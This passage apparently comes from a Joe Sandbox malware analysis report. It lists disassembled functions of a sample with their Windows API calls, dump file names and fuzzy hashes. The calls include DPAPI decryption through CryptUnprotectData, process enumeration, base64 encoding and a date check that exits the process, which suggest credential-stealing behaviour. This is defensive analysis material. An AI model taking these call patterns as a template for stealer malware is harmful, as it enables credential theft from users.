                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: A~$E]]~$e,Y$kNWo$mCmi
                              • API String ID: 0-275301365
                              • Opcode ID: 78f9311134010d27747dc2a62b1bcf567df916eaf49fb0971fb875d818219cca
                              • Instruction ID: a862eacb6059cc4af6cb27a0f6245b3f6839797513cebb2a74790d50276b5f7d
                              • Opcode Fuzzy Hash: 78f9311134010d27747dc2a62b1bcf567df916eaf49fb0971fb875d818219cca
                              • Instruction Fuzzy Hash: D1A204F36086049FE704AE2DEC8567AFBE5EF94720F1A493DEAC4C3344E63598158687
                              Function 0032C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0032C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0032C87C
                              • lstrcat.KERNEL32(?,00340B46), ref: 0032C943
                              • lstrcat.KERNEL32(?,00340B47), ref: 0032C957
                              • lstrcat.KERNEL32(?,00340B4E), ref: 0032C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 98d8a18ecc64ea955157865bb871cf9fd4a373eab4d993a8bfcdd1908e431e4b
                              • Instruction ID: 842a6e5adb78ea92c707e804efc93979c877127f9ce8c23ce833a91bd249867f
                              • Opcode Fuzzy Hash: 98d8a18ecc64ea955157865bb871cf9fd4a373eab4d993a8bfcdd1908e431e4b
                              • Instruction Fuzzy Hash: 2F4182B5D1421ADFDB10CFA4DD89BEEB7B8BB44304F1041A8E509B7280D7B0AA84DF91
                              Function 00336920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0033696C
                              • sscanf.NTDLL ref: 00336999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003369B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003369C0
                              • ExitProcess.KERNEL32 ref: 003369DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 4b72403d9358686883f554f9b6db281245c5c9953de9ea467ff95c23338f96d9
                              • Instruction ID: 761cf08dee9438199729f1316dd890bae776898e358a6ddf7aa12a8e17863e3a
                              • Opcode Fuzzy Hash: 4b72403d9358686883f554f9b6db281245c5c9953de9ea467ff95c23338f96d9
                              • Instruction Fuzzy Hash: 1321EA75D10208AFCF04EFE8D985AEEB7B5BF48300F04852AE406B3250EB745609DBA5
                              Function 00327240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0032724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00327254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00327281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003272A4
                              • LocalFree.KERNEL32(?), ref: 003272AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 4b0f749bdceb93d93037002f526dd120d0c8bcde359aa7b956ee1233627005fe
                              • Instruction ID: d44ac4df97f65aee4a14caf3c31647f3b7a4d9ed389f60302cdec2e36f322831
                              • Opcode Fuzzy Hash: 4b0f749bdceb93d93037002f526dd120d0c8bcde359aa7b956ee1233627005fe
                              • Instruction Fuzzy Hash: 72010CB5A40208BBEB14DFD8DD4AF9E77B8EB44B04F104558FB05BB2C0D6B0AA049B65
                              Function 00339600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0033961E
                              • Process32First.KERNEL32(00340ACA,00000128), ref: 00339632
                              • Process32Next.KERNEL32(00340ACA,00000128), ref: 00339647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0033965C
                              • CloseHandle.KERNEL32(00340ACA), ref: 0033967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: c27fb3dbd7f7736729af00e848c03560a759f7388f3615e52630a8301567ee1d
                              • Instruction ID: 8556ba097904d07849ed6cb2f348c2a996b2d2abdf51a17f5967b1fa639024ca
                              • Opcode Fuzzy Hash: c27fb3dbd7f7736729af00e848c03560a759f7388f3615e52630a8301567ee1d
                              • Instruction Fuzzy Hash: 6F011E75A01208EBCB15DFA9CD89BEDB7F8EB58310F104189E909A7250DBB4AB44DF51
                              Function 006E15FD Relevance: 6.5, Strings: 4, Instructions: 1543COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: (9m[$G5M_$jO$jO
                              • API String ID: 0-1708999616
                              • Opcode ID: 78b24827a67af97f58d95914e59e3382eaf04f5421aeb389e60a4f5f9549ca7b
                              • Instruction ID: e8de0409c9d04a7dc15fe009525d0c85869766837500f9cd161ea0ad4f154c0b
                              • Opcode Fuzzy Hash: 78b24827a67af97f58d95914e59e3382eaf04f5421aeb389e60a4f5f9549ca7b
                              • Instruction Fuzzy Hash: FCB2F4F3A0C3149FE304AE2DEC8566AFBE5EF94320F16493DEAC487744EA3558448697
                              Function 00338EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00325184,40000001,00000000,00000000,?,00325184), ref: 00338EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 1114aea0993611446f386945d03ea0d1d115b83e28851bb2ffda7b7713833c23
                              • Instruction ID: 8266e4b3ba2046bd052c1264e421985673b4c2a4f9565fcfa883b50e5d3d56a9
                              • Opcode Fuzzy Hash: 1114aea0993611446f386945d03ea0d1d115b83e28851bb2ffda7b7713833c23
                              • Instruction Fuzzy Hash: 5D11E574200309BFDB01CFA8E885FAB37A9AF89714F109558F9198B250DB75ED45EB60
                              Function 00337A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0109E5F0,00000000,?,00340E10,00000000,?,00000000,00000000), ref: 00337A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00337A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0109E5F0,00000000,?,00340E10,00000000,?,00000000,00000000,?), ref: 00337A7D
                              • wsprintfA.USER32 ref: 00337AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 1a45c6691eaae772dcf78ad1437dccb19e1613d8a0f38e8d37d449e09ce82338
                              • Instruction ID: 48d137b320e62d306b2fec151bdcf6f30bd86d2e2fdc3b8e71455e82e33e307f
                              • Opcode Fuzzy Hash: 1a45c6691eaae772dcf78ad1437dccb19e1613d8a0f38e8d37d449e09ce82338
                              • Instruction Fuzzy Hash: AE1182B1D45218DBEB208B58DC45F99B778FB04711F104395E516A32D0C7745A44CF51
                              Function 006F2121 Relevance: 5.3, Strings: 3, Instructions: 1599COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: e3$S9_{$e[z
                              • API String ID: 0-1062808939
                              • Opcode ID: b9d106799fe2239887f3ec9a9751e1d14ebc57972001d9e2c8fa1a7b91ecb829
                              • Instruction ID: d54a2e75efcc539f9fd6f6ae505dbe6773d6256c89cd85601ad54322ae9443d6
                              • Opcode Fuzzy Hash: b9d106799fe2239887f3ec9a9751e1d14ebc57972001d9e2c8fa1a7b91ecb829
                              • Instruction Fuzzy Hash: D9B216F3A0C2109FE3086E2DEC5577ABBE9EF94320F1A493DEAC5C3744E63558058696
                              Function 006EA3D9 Relevance: 4.7, Strings: 3, Instructions: 922COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 4@I<$BK$\4FL
                              • API String ID: 0-1039229860
                              • Opcode ID: d20613acaa7a38e068f1d945d2b7f365e3ea64044493e82aec3a5d5c1bf3c248
                              • Instruction ID: 757a361e175d871cbc515e6231264d3d71afbab6a1090ef6e9b7a01f43d62ae3
                              • Opcode Fuzzy Hash: d20613acaa7a38e068f1d945d2b7f365e3ea64044493e82aec3a5d5c1bf3c248
                              • Instruction Fuzzy Hash: 085238F360C204AFE7046E2DEC8567ABBE9EFD4320F16492DE6C4C7744EA3558018697
                              Function 00333720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(0033E118,00000000,00000001,0033E108,00000000), ref: 00333758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003337B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 7c791aecea633b4bd28298838a6212e9ad64ce594b5b2ea8c8d1c95202c48bd0
                              • Instruction ID: a6c6b377487e842f2882ca38eceeb9f06a4a991f9dffc9d548a041bbf83c88ea
                              • Opcode Fuzzy Hash: 7c791aecea633b4bd28298838a6212e9ad64ce594b5b2ea8c8d1c95202c48bd0
                              • Instruction Fuzzy Hash: 4941C774A40A289FDB24DB58CC95FDBB7B5BB48702F4081D8E609AB2D0D7B16E85CF50
                              Function 00329B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00329B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00329BA3
                              • LocalFree.KERNEL32(?), ref: 00329BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
